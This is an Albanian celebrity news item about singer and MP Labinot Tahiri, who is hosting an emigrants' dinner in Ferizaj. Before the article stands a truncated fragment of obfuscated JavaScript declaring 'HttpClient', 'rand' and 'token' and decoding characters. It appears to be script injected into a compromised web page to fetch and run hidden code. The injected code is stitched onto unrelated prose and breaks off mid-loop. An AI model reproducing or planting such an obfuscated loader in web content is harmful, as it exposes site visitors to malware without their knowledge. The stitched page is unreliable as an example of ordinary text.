;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Emocionohet Labi, thotë se do të qajë në “Darkën e Kurbetqarit” në Ferizaj

By

Këngëtari i famshëm kosovar, e po ashtu edhe deputet në Kuvendin e Kosovës, do të organizojë një darkë për të gjithë mërgimtarët në qytetin e tij të lindjes.

Labinot Tahiri që vjen nga Ferizaj, nuk e ka për herë të parë organizimin e një ngjarjeje të tillë, që mbledh në sheshin e qytetit të gjithë mërgimtarët.

E kësaj here, ai tregohet shumë i emocionuar në llogarinë e tij në Instagram, e thotë se edhe do të qajë nga fjalët që do thotë para bashkatdhetarëve.

“Sonte kur t’i lexoj fjalët e arta për kurbetqarit, do të bëhem e do të bëhemi me lot, por do jenë lot gëzimi”, ka shkruar Labi, duke shtuar se kjo mbrëmje në Ferizaj, nuk do të harrohet. /Prive.al

Artikuj të ngjashëm